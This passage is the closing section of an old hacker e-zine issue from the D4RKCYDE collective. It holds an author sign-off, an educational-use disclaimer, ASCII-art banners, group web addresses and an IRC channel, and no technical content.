found something in here that you never knew before reading it. If you have
any comments or suggestions about this article, please feel free to send me
an email to: jasun@phreaker.net I hope this gave you a little insight into
Packet.
Look out for more articles from me in the future. I have made this information as
accurate as possible to my knowledge, but don't complain if I made an error,
most of this was written at times around 4am in the morning.
Disclaimer:
===========
This document is for educational *INTERNAL USE ONLY*
It is for educational purposes only, the information contained within it must
not be used to cause damage to any person/system. What you do with this
information is your business, but anything that arises from its misuse cannot be
held against anybody, apart from yourself.
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->[OO]:::::::::::::::[ Outness ]::::::::::::::::::::::::::::::::::::::::::::
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
There ya have it, another quality issue of f41th brought to you by the
D4RKCYDE collective [ http://darkcyde.system7.org ] Keep reading, and
remember.. h4x0r1ng just 41nt d4 s4m3 w1th0ut pr0-plus c4ff3n3 p1llz. WERD to
everyone in #darkcyde, and everyone that helps with f41th, you own. Bow Down.
-----------------------------------------------------------------------------
############# ################ ###############
############# ################ ###############
##### ##### ##### ######
##### ##### ##### ######
############# ##### ##### ##############
############# ##### ##### ##############
##### ##### ##### ######
##### ##### ##### ######
############## ################ ######
############## ################ ######
[ D 4 R K C Y D E ]
[ ]
[ http://darkcyde.system7.org http://hybrid.DTMF.org ]
[ #darkcyde EFNET (no lamerz) ]
'...find us on the PSTN b1tch...'
